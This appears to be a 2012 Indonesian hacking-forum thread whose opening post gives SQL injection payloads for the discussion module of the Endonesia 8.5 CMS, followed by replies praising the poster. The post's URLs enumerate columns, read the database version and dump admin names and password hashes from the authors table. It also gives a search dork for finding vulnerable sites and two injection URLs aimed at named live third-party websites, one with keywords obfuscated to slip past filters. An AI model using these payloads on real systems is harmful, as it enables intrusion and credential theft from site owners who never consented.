Threaded Mode | Linear Mode

**ohara_inamiji** · (This post was last modified: 03-04-2012 01:24 AM by ohara_inamiji.)

iseng-iseng browsing dan dapat info kalo cms yang sering ane inject dah rilis versi terbaru...
kalau mau ngoprek via localhost silahkan download di link ini " http://nchc.dl.sourceforge.net/project/e...ia.8.5.zip"

untuk versi sebelum nya, bisa di cek di sini : EXPLOIT CMS ENDONESIA- EXPLOIT-DB "

kembali ke topik, untuk fitur terbaru dari cms ini bisa di baca di link ini " http://www.indoplaces.org/mod.php?mod=pu...1&artid=43 "

berikut screenshot cms nya di localhost ane ketawa

langsung ke bug nya pada "mod_diskusi"

Cheat SQL Injection nya

- http://localhost/ohara/mod.php?mod=diskusi&op=viewdisk&did=7+order+by+1,2,3,4,5,6,7#

- http://localhost/ohara/mod.php?mod=diskusi&op=viewdisk&did=-7+union+all+select+1,2,3,4,5,6,7#

- http://localhost/ohara/mod.php?mod=diskusi&op=viewdisk&did=-7+union+all+select+1,2,unhex(hex(@@version)),4,5,6,7#

- http://localhost/ohara/mod.php?mod=diskusi&op=viewdisk&did=-7+union+all+select+1,2,unhex(hex(group_concat(aid,0x3a,name,0x3a,pwd))),4,5,6,7+from+authors#

[+] dork [+]

powered by Endonesia 8.5

[+] online demo [+]

Code:

http://www.planethijau.com/mod.php?mod=diskusi&op=viewcat&cid=-32+uniOn+all+sElect+1,group_concat(name,0x3a,pwd),3+from+authors--

Code:

http://hosting.indoplaces.com/mod.php?mod=publisher&op=viewarticle&cid=5&artid=-1+%2F*!union*/+all+/*!select*/+1,2,database%28%29,4,5,user%28%29,7,unhex%28hex%28version%28%29%29%29,9,10--

**civo** · 03-03-2012, 05:18 PM

oalah..

tadi yang minta tolong buat di bypass tadi yaa omz kazekage mantap

ane ga perhatiin tadi... ngakak

**ohara_inamiji** · 03-03-2012, 05:19 PM

(03-03-2012 05:18 PM)civo Wrote: oalah..
tadi yang minta tolong buat di bypass tadi yaa omz kazekage
ane ga perhatiin tadi...

iya om civ
maklum newbie ane om ketawa

poticous · 03-03-2012, 05:21 PM

keren om
ijin di pelajari om belajar

**ohara_inamiji** · 03-03-2012, 05:23 PM

(03-03-2012 05:21 PM)poticous Wrote:
keren om
ijin di pelajari om

belajar bareng om, monggo...

**CitooZz** · 03-03-2012, 05:24 PM

nt om

**civo** · 03-03-2012, 05:25 PM

(03-03-2012 05:24 PM)CitooZz Banditozz Wrote: nt om

OOT

jackerp · 03-03-2012, 05:36 PM

Hebat ente rupanya.. !!

cangcimen · 03-03-2012, 05:37 PM

nice share om ketawa

KotoM · 03-03-2012, 05:57 PM

hekcer

mau dong jadi pacar kk tersipu

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Tutor] WordPress Exploit (easy-comment-uploads/upload-form.php)	XPByte	16	1,032	05-19-2013 05:40 PM Last Post: oe_c0x
	[Tutor] Facebook session Exploit Priv8	abuabu_hat10	20	390	05-19-2013 05:36 PM Last Post: oe_c0x
	MinaliC Webserver 2.0.0 HTTP Post Exploit	cr0security	8	139	04-23-2013 09:07 AM Last Post: darkmessage
	[Tutor] Exploit windows dengan add on dan dns spoof	RieqyNS13	17	335	02-10-2013 08:35 PM Last Post: cangcimen
	[Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload	Regel	11	672	02-02-2013 12:19 AM Last Post: copaker21
	Butuh Local Exploit Kernel Server	AnonymousOpsID	2	162	11-24-2012 08:37 PM Last Post: AnonymousOpsID
	#DiyWeb Admin Bypass dan Remote file/shell Upload exploit	AnonymousOpsID	4	336	11-06-2012 05:07 PM Last Post: rock_me
	Kumpulan exploit dan 3000++ tool hacking	dvildance	3	344	10-31-2012 10:23 PM Last Post: jibril
	[Ask] [metasploit] gagal exploit ke komputer target via LAN	w0rmil_alazka	10	188	10-29-2012 10:46 AM Last Post: p0pc0rn
	php root shell exploit buat mesin x86_64 (tanpa bind dan bc)	mywisdom	38	1,661	10-01-2012 10:06 PM Last Post: Danzel